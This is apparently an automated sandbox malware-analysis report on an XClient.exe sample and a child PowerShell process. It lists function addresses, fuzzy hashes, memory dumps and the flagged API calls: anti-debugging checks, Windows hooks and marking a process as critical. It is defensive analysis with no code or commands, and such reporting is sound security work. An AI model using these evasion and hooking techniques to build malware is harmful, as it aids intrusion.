Snapshot File: hcaresult_0_2_7ff7bfee0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b5fe802a981af24634b32606765d3f3e67af719df7831ed08aa0870ad0957b2
Instruction ID: 4e7387bae4e11c90f28a751dc3702d0a16a5e6c399f69c73a344976770aaff57
Opcode Fuzzy Hash: 8b5fe802a981af24634b32606765d3f3e67af719df7831ed08aa0870ad0957b2
Instruction Fuzzy Hash: 5A31D431B1CAC84FE785A76C5C586F9BBE1EFAA201B4801FBE04DC3293DE186841C712

Function 00007FF7BFEE09F7 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1457968425.00007FF7BFEE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bfee0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d2df5b4e129c0ad6f3b611dfeca34c7e4e8853b5b0ee92c2115c2e727dbdabe
Instruction ID: 1f92eca997302814443380f9e1cf6fb571dca91b714a1cc5fa29f3564d7ef348
Opcode Fuzzy Hash: 0d2df5b4e129c0ad6f3b611dfeca34c7e4e8853b5b0ee92c2115c2e727dbdabe
Instruction Fuzzy Hash: 26716230A289498FEB98EB6CD458BBDBBE2FF95314F500269E11AD32D5DF34A841C711

Function 00007FF7BFEE0D80 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1457968425.00007FF7BFEE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bfee0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67137916868bc038f292d6d9b1963aa2071c1063520b4cbb7e41671d3346b39a
Instruction ID: b801bca969b7e19aef869c94b4e3a4fc2786ba1602c915867fb92c9664a3d438
Opcode Fuzzy Hash: 67137916868bc038f292d6d9b1963aa2071c1063520b4cbb7e41671d3346b39a
Instruction Fuzzy Hash: 6A317A6184E3C25FC74367B45C664E17FB09E5722074A41EBD4C4CF4E3D51C699AC762

Function 00007FF7BFEE0498 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1457968425.00007FF7BFEE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bfee0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60483f6dd12118130da9abcb82ab7656bd3e39a01e9d57f64008d4e964fc3d79
Instruction ID: a82cd725482cdd3f217855ec500e8eab5ef56a4285d4a85798c79ed34281f469
Opcode Fuzzy Hash: 60483f6dd12118130da9abcb82ab7656bd3e39a01e9d57f64008d4e964fc3d79
Instruction Fuzzy Hash: 78218830B14D4D4FDB84FB6C98996FDB7E2EFA9351B44017AE40EC3293DE24A8418751

Function 00007FF7BFEE0EF9 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1457968425.00007FF7BFEE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bfee0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 123b1d929133810f22e79f1b0ac73d6a90a97ac760c0744dabce4b879d624e9c
Instruction ID: e9d00ca3bd92aa16a7b46a3a1b0c28707563919406fe634bcd890f6d8c661388
Opcode Fuzzy Hash: 123b1d929133810f22e79f1b0ac73d6a90a97ac760c0744dabce4b879d624e9c
Instruction Fuzzy Hash: BF01F522E0D9864FE39467BC285A2F5FBD5DF97350B8901B9E24EC3587ED1878428351

Function 00007FF7BFEE0E71 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1457968425.00007FF7BFEE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bfee0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0a2e02bded579233fceb6132e3a9b6e30a8f4ef89f29edc0243a9b091128289
Instruction ID: e7226761c892bf8b74dc12f019ce22758c9533a367462de374a91c1538dda975
Opcode Fuzzy Hash: a0a2e02bded579233fceb6132e3a9b6e30a8f4ef89f29edc0243a9b091128289
Instruction Fuzzy Hash: 81019E3062DECA4FD788E77C98512B8B3C0EF89710F400279C289C32D6DE28B8428781

Function 00007FF7BFEE04A0 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1457968425.00007FF7BFEE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bfee0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e671455765955f8d9523d1bdfd3a06bffa21752aa02937eae4ee679a0f2fc84
Instruction ID: d9fdda03edf2fd46709998da1ab4273eda2fb44aaeea66e6523b37c3fc7f4b2d
Opcode Fuzzy Hash: 3e671455765955f8d9523d1bdfd3a06bffa21752aa02937eae4ee679a0f2fc84
Instruction Fuzzy Hash: 98F02832F0C8494BF3A476BC384E3F8E7C5DB99764F850178E20EC3286EC1878828211

Function 00007FF7BFEE04B0 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1457968425.00007FF7BFEE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bfee0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c17182fd46c77c5700d643613a984a24dcb33b9ca9d79b4aa6c0200c3a41b1d
Instruction ID: 1d145382463a2978692e237eb9a16c90d0d961f57185cd2a231c98c96e9131e7
Opcode Fuzzy Hash: 0c17182fd46c77c5700d643613a984a24dcb33b9ca9d79b4aa6c0200c3a41b1d
Instruction Fuzzy Hash: 52F0A93072895A4BDA98FA6C94556B973D1EBC9710F900139D58EC3289DE28B8428785

Function 00007FF7BFEE04A8 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1457968425.00007FF7BFEE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7bfee0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a08f5c7a5cfdde3521861ad968f2969d9bb4f54711a815a8027cae142f6f4e32
Instruction ID: 852190dc9aaeaa782cf0dce194164b27d07af17c8e2add69577acef1f8290e47
Opcode Fuzzy Hash: a08f5c7a5cfdde3521861ad968f2969d9bb4f54711a815a8027cae142f6f4e32
Instruction Fuzzy Hash: 23F0423062DA5A4BD758F67CA4416F973D1DFC9710F500279D28DC338ADD28B84287C4

Analysis Process: XClient.exePID: 7992, Parent PID: 7824COMMON

Execution Graph

Execution Coverage:	23.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	16.7%
Total number of Nodes:	18
Total number of Limit Nodes:	0

Executed Functions

Function 00007FF7BFED5C06 Relevance: 3.0, Strings: 2, Instructions: 472
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,4 0, xrefs: 00007FF7BFED609B
,4 0, xrefs: 00007FF7BFED5C78

Memory Dump Source

Source File: 00000004.00000002.2718920327.00007FF7BFED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7bfed0000_XClient.jbxd

Similarity

API ID:
String ID: ,4 0$,4 0
API String ID: 0-102155951
Opcode ID: 14e0b1dcfba0dee0efdb54d9df607d446a434196b51a19d687ccc68732c43f26
Instruction ID: b3f0a9192e15cfcab55cadb92fc0662b646e1fb71c4232a19fc0c230a4d694fd
Opcode Fuzzy Hash: 14e0b1dcfba0dee0efdb54d9df607d446a434196b51a19d687ccc68732c43f26
Instruction Fuzzy Hash: FFF1B330908B8D8FEBA8EF28C8557F977D1FBA5310F44426AE84DC7695CF34A8418B91

Function 00007FF7BFED69B2 Relevance: 3.0, Strings: 2, Instructions: 458
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,4 0, xrefs: 00007FF7BFED6A28
,4 0, xrefs: 00007FF7BFED6E17

Memory Dump Source

Source File: 00000004.00000002.2718920327.00007FF7BFED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7bfed0000_XClient.jbxd

Similarity

API ID:
String ID: ,4 0$,4 0
API String ID: 0-102155951
Opcode ID: 1220ccffa16e15cb23fa88e55627e00801b6c36ffde7e2f0047750361167b1bd
Instruction ID: 53b88e93d0cebf9e0e07830c4b601f2deec717ed6413e56e197baaf3b7ec481c
Opcode Fuzzy Hash: 1220ccffa16e15cb23fa88e55627e00801b6c36ffde7e2f0047750361167b1bd
Instruction Fuzzy Hash: 30E1C430908A8D8FEBA8EF28C8557F977D1FBA5310F44426ED84DC7695CF74A8458B81

Function 00007FF7BFED1329 Relevance: 2.0, Strings: 1, Instructions: 749
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CAN_^, xrefs: 00007FF7BFED163C

Memory Dump Source

Source File: 00000004.00000002.2718920327.00007FF7BFED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7bfed0000_XClient.jbxd

Similarity

API ID:
String ID: CAN_^
API String ID: 0-3098826533
Opcode ID: efe39960ee40a356f95fa0fcafc2edc185d136e66c3c0bfbc04c8ee4d9a46b82
Instruction ID: 84a4eb1d8397617b0d76c9c9315109672fd45e35f1e4c6f1ac31f3d947b692ed
Opcode Fuzzy Hash: efe39960ee40a356f95fa0fcafc2edc185d136e66c3c0bfbc04c8ee4d9a46b82
Instruction Fuzzy Hash: 8932B730B18A4A4FE798FB7C84692B9BBD2FF99750F84057DE40EC36D6DD28A8018741

Function 00007FF7BFED7163 Relevance: 1.6, APIs: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNEL32 ref: 00007FF7BFED7670

Memory Dump Source

Source File: 00000004.00000002.2718920327.00007FF7BFED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7bfed0000_XClient.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 7171373c7127822af0ef1252a45704b83a12671ed457c499a0be683ce8e28071
Instruction ID: 069b158a17e45117187e0d74c7fa8d98d0be3e96d3c663fe21cf4fa3a39af63f
Opcode Fuzzy Hash: 7171373c7127822af0ef1252a45704b83a12671ed457c499a0be683ce8e28071
Instruction Fuzzy Hash: 6831C331908A1C8FDB58DF9CC8467F9BBE0FF65321F14426AD48AD7242DB74A8468B91

Function 00007FF7BFED1ED1 Relevance: .4, Instructions: 384COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2718920327.00007FF7BFED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7bfed0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da3f64f32034142b26d6b68dcf0278a5342866670735f8e6f8524a6c7897a0b5
Instruction ID: ed94234a75430c8e375b1b73712f21ebaa7290b39d99fa62c021bdadf4f0995c
Opcode Fuzzy Hash: da3f64f32034142b26d6b68dcf0278a5342866670735f8e6f8524a6c7897a0b5
Instruction Fuzzy Hash: 2EB1B334B1C94A5FEB88EB7C84593B9B6D2FFD9700F44417AE14EC36D6DE28A8028741

Function 00007FF7BFEDA440 Relevance: .4, Instructions: 376COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2718920327.00007FF7BFED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7bfed0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0acf43d75fd26f3ccfc0d8919558e41b045d53a088b714def88589a421256c5
Instruction ID: 7ea781c038ea8201ee5a3e28ed4f5eefed40a89505a15b98153961d282905af1
Opcode Fuzzy Hash: b0acf43d75fd26f3ccfc0d8919558e41b045d53a088b714def88589a421256c5
Instruction Fuzzy Hash: 77B13921E1DA8A4FE744FB7C88492B9F7D1EF96B50F88027AD00DC3597DD28B9068391

Function 00007FF7BFED1C45 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2718920327.00007FF7BFED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7bfed0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8ab664dcf749d928ab92bd8ddc4376c78b34732caed5e0ad992b45ba2dc8bc1
Instruction ID: f6adef5baaff859eccf40186673e74c93cb2f7a1ed39a442bdf92b1c41aeb00d
Opcode Fuzzy Hash: f8ab664dcf749d928ab92bd8ddc4376c78b34732caed5e0ad992b45ba2dc8bc1
Instruction Fuzzy Hash: F6510124A1DAC94FE786AB7C48642B6BFD1DF97265B1801FFE089C7297DD085806C352

Function 00007FF7BFED8D95 Relevance: 1.7, APIs: 1, Instructions: 169
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32 ref: 00007FF7BFED9C41

Memory Dump Source

Source File: 00000004.00000002.2718920327.00007FF7BFED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7bfed0000_XClient.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: d8fec12690d053f8f9131d17a9f26e81016446716a73bc101ba4bc43e67c090b
Instruction ID: 3c7ba321e563119b5965e49f965fa7e0119ad9ab4f1f141e29dfe5ab423fc9a3
Opcode Fuzzy Hash: d8fec12690d053f8f9131d17a9f26e81016446716a73bc101ba4bc43e67c090b
Instruction Fuzzy Hash: 42410731A0CA899FD708EB6CD8156F9BBA1EFA5724F04427BD04DC7192CE24B816C791

Function 00007FF7BFED91F9 Relevance: 1.6, APIs: 1, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlSetProcessIsCritical.NTDLL ref: 00007FF7BFED92C2

Memory Dump Source

Source File: 00000004.00000002.2718920327.00007FF7BFED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7bfed0000_XClient.jbxd

Similarity

API ID: CriticalProcess
String ID:
API String ID: 2695349919-0
Opcode ID: 9be57a94c3e6b25261ee19ee6eb38a05680300ed6b41b6ef2a3947fbb5c02d66
Instruction ID: b767af31a7fc2a1b48df0af8a4381c3c0bbe0e0074789dfc933c1ee86aeff661
Opcode Fuzzy Hash: 9be57a94c3e6b25261ee19ee6eb38a05680300ed6b41b6ef2a3947fbb5c02d66
Instruction Fuzzy Hash: AE41E53180C6498FD718DFA8D845BE9BBF0FF56311F04426EE08AD3692CB74A846CB91

Function 00007FF7BFED9B78 Relevance: 1.6, APIs: 1, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32 ref: 00007FF7BFED9C41

Memory Dump Source

Source File: 00000004.00000002.2718920327.00007FF7BFED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7bfed0000_XClient.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 8e3a55a59dff1a371c882adde40b2114d719dc93fd87ff8c0488f1a335d27837
Instruction ID: 210ca98d61a3b42fa59e613c0f46ed4d08b7a28b6d6ade515d56cdf500f1ce5a
Opcode Fuzzy Hash: 8e3a55a59dff1a371c882adde40b2114d719dc93fd87ff8c0488f1a335d27837
Instruction Fuzzy Hash: 5731F93091CE4D4FDB18EF6C98466F9BBE1EF99321F04423ED049C3692CE64A8128BC1

Function 00007FF7BFED8D60 Relevance: 1.6, APIs: 1, Instructions: 132
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32 ref: 00007FF7BFED9C41

Memory Dump Source

Source File: 00000004.00000002.2718920327.00007FF7BFED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7bfed0000_XClient.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: ddc9d4416416bf43232501d5809b090874e1839805ec545227525e25bd9dce99
Instruction ID: 3bf38336939d9e9acba625e91a90adc9958646b62ca99c2861f0d1a2ce74691a
Opcode Fuzzy Hash: ddc9d4416416bf43232501d5809b090874e1839805ec545227525e25bd9dce99
Instruction Fuzzy Hash: 4431A230A1CE5D8FDB58EF5C98066F9B7E1EBA9321F00423ED04AD3652CA64A81287D1

Function 00007FF7BFED75C1 Relevance: 1.6, APIs: 1, Instructions: 127
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNEL32 ref: 00007FF7BFED7670

Memory Dump Source

Source File: 00000004.00000002.2718920327.00007FF7BFED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7bfed0000_XClient.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 3d8cb96b37398342bce52e5cc2846b16077060162b7f6c06cf8cedb85d714fa8
Instruction ID: 94a15a482bbd491be84b666671a7d07409ab61cd0058e7b257f5241470a50f5a
Opcode Fuzzy Hash: 3d8cb96b37398342bce52e5cc2846b16077060162b7f6c06cf8cedb85d714fa8
Instruction Fuzzy Hash: 8C3112319087588FCB58DF58C84ABE97BF0FF65321F05426BD489D7292DB34A846CB91

Analysis Process: powershell.exePID: 8136, Parent PID: 7992COMMON

Executed Functions

Function 00007FF7BFF95AAE Relevance: .6, Instructions: 555COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1619349549.00007FF7BFF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bff90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20ce69b4311b1fc5ca5ba6ff1851ff3add8536b8f00a7dd95aa02d0d321901cb
Instruction ID: 3f6542f4bba9e2a07fbf24680586a213a64a4037ea42937f0c500bf23ba8cc4e
Opcode Fuzzy Hash: 20ce69b4311b1fc5ca5ba6ff1851ff3add8536b8f00a7dd95aa02d0d321901cb
Instruction Fuzzy Hash: 43F16521A0DACA4FE796EBAC98546B8BBE1EF56620B4802FFD04DCB197DD18D805C351

Function 00007FF7BFF9660A Relevance: .4, Instructions: 374COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1619349549.00007FF7BFF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bff90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9eff372e97b60d2f44c9b5efcd1c0fbb58450c4e6cd4a7b6735fdab327266cb
Instruction ID: b7bb01c64fca80d7552dc69b60cb654d963481d16ea4c856164d1cceaee08b5b
Opcode Fuzzy Hash: a9eff372e97b60d2f44c9b5efcd1c0fbb58450c4e6cd4a7b6735fdab327266cb
Instruction Fuzzy Hash: BBB14531A0EACA4FE795ABAC54541B9FBE0EF16755B4842FED05CCB083DE18E805C361

Function 00007FF7BFF96480 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1619349549.00007FF7BFF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bff90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1449285bf22f829c044e747782420ce360ccec05ece7a6ed2befc02d3e144428
Instruction ID: f426e8a7cc8c6334d51c3cbe98e43efd66192703d6121446e7d7bc648fce4bcd
Opcode Fuzzy Hash: 1449285bf22f829c044e747782420ce360ccec05ece7a6ed2befc02d3e144428
Instruction Fuzzy Hash: B5912722A0EBC64FE796A7BC54A01A8BBE0EF66651B5841FFC04DCB1D7DD189C09C361

Function 00007FF7BFF96660 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1619349549.00007FF7BFF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bff90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5753e4174ce97c6848184009719ee387f68b9524268ff5416c6b7e9a50b3314
Instruction ID: e97a1d231e830b3f6615aa8090b435b4a206671aff222a6d1bc17d709f89534e
Opcode Fuzzy Hash: d5753e4174ce97c6848184009719ee387f68b9524268ff5416c6b7e9a50b3314
Instruction Fuzzy Hash: 1C712231E1EAC64FE795ABAC44642B8FAD1EF26B55B9841FEC05DCB087CD18EC058351

Function 00007FF7BFF9640E Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1619349549.00007FF7BFF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bff90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e1b2fdb678aeb4bdc5aba9e6a0a9bfca77beb0b78f6e4fc2867f3a2aac044e2
Instruction ID: 7ffebf28b2ca0bc0f7bb31391045a63dfd7b6519dbbde34e801653470d65be60
Opcode Fuzzy Hash: 0e1b2fdb678aeb4bdc5aba9e6a0a9bfca77beb0b78f6e4fc2867f3a2aac044e2
Instruction Fuzzy Hash: 34710421A0EBC24FE793A7BC44611A8BFE1EF17661B4941FEC18DCB097C919D80AC352

Function 00007FF7BFF95F21 Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1619349549.00007FF7BFF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bff90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 288b667abfb811a2a1dce8f14545699a049e26873dc3390a094b18c5e11c50b2
Instruction ID: 99b08efedcaa0f5793d3d4c255ab7840185b2ea43db43933c82f36495a6da512
Opcode Fuzzy Hash: 288b667abfb811a2a1dce8f14545699a049e26873dc3390a094b18c5e11c50b2
Instruction Fuzzy Hash: D3615521E0EBC64FE796A7AC44A01B8BBE1EF22665B9841FEC14DCB0D7DD18DC058351

Function 00007FF7BFF95EF5 Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1619349549.00007FF7BFF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bff90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42bfc1173328dfc5eb7bb6ffd57ca90e63b38cdcf66bd8195c0449710e0b19b9
Instruction ID: fadc2cfb7109eefa0412a46624044ceca6f880342bc5353033e6c69dc97def5f
Opcode Fuzzy Hash: 42bfc1173328dfc5eb7bb6ffd57ca90e63b38cdcf66bd8195c0449710e0b19b9
Instruction Fuzzy Hash: B5612421A0EBC24FE796A7EC44A11B8BBE1EF17665B9841FEC14DCB097DD18D806C352

Function 00007FF7BFF963F7 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1619349549.00007FF7BFF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bff90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00fda83292825b949c86736fe1f3681daf90a1a99d287786ec3d0a445c52e8ad
Instruction ID: 39db2265bcd7d7695de5cf4a25e915eafe38023b2cc254be7b9cd5111942b37d
Opcode Fuzzy Hash: 00fda83292825b949c86736fe1f3681daf90a1a99d287786ec3d0a445c52e8ad
Instruction Fuzzy Hash: 4E613621A0EAC64FE796A7EC44A11B8BBE1EF17665B9841FEC14DCB097CD18DC06C352

Function 00007FF7BFF94073 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1619349549.00007FF7BFF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bff90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 629a144b7a3cf47ce67c88d231e731ab60e00aa3a1950e0a4abd9b58331f86df
Instruction ID: 52305fe2555c66091655bd5978ae1c9b6c319f5da5602a8d2d21ac7fe98aa8aa
Opcode Fuzzy Hash: 629a144b7a3cf47ce67c88d231e731ab60e00aa3a1950e0a4abd9b58331f86df
Instruction Fuzzy Hash: 2A518A32E0CE864FE79ADA5C54111F4B7D2EF76621B8881BEC11DC729BCE24EC018350

Function 00007FF7BFF961CD Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1619349549.00007FF7BFF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bff90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6505229e8b0ab9237fb5f203fcb381c514a0480368b09180e4d5bf5986be0b97
Instruction ID: 56c698ee0c8612f01aae67121f9bd52f14d09d5e3fe9564d7c89753364e3e2c5
Opcode Fuzzy Hash: 6505229e8b0ab9237fb5f203fcb381c514a0480368b09180e4d5bf5986be0b97
Instruction Fuzzy Hash: AD510421A1EAC68FEB96E7EC44A12B8BBE1EF16655B9841FEC14DCB087CD18DC058351

Function 00007FF7BFEC9738 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1618636827.00007FF7BFEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bfec0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e7127c07c5febc49a2ce5d7c2b859c43b742a06cc60a325ad84543d790bd0f3
Instruction ID: 5eccbe4a0f0c3931e96bb550869ab3fb973e807596e904210fc62cb070dab597
Opcode Fuzzy Hash: 2e7127c07c5febc49a2ce5d7c2b859c43b742a06cc60a325ad84543d790bd0f3
Instruction Fuzzy Hash: D3410A31D0DE888FDB58AF5C98066FCBBE0FBA5710F40416FE44983296DA24A815C7C2

Function 00007FF7BFDAE384 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1617947145.00007FF7BFDAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFDAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bfdad000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13ecc9d7ffb9c724a6b318ceebbd3ea134e7acd7797cb39e0a7dddc3b4316454
Instruction ID: 6b3ae7fbf25a3fd649afe5779030fffc4f32fd38cc599afd8dd5827f9b297cfc
Opcode Fuzzy Hash: 13ecc9d7ffb9c724a6b318ceebbd3ea134e7acd7797cb39e0a7dddc3b4316454
Instruction Fuzzy Hash: 6F41237040EFC44FE756AB2D98519927FB0EF53215B1501EFD088CB1A7D625E80AC7A2

Function 00007FF7BFECA47C Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1618636827.00007FF7BFEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7bfec0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
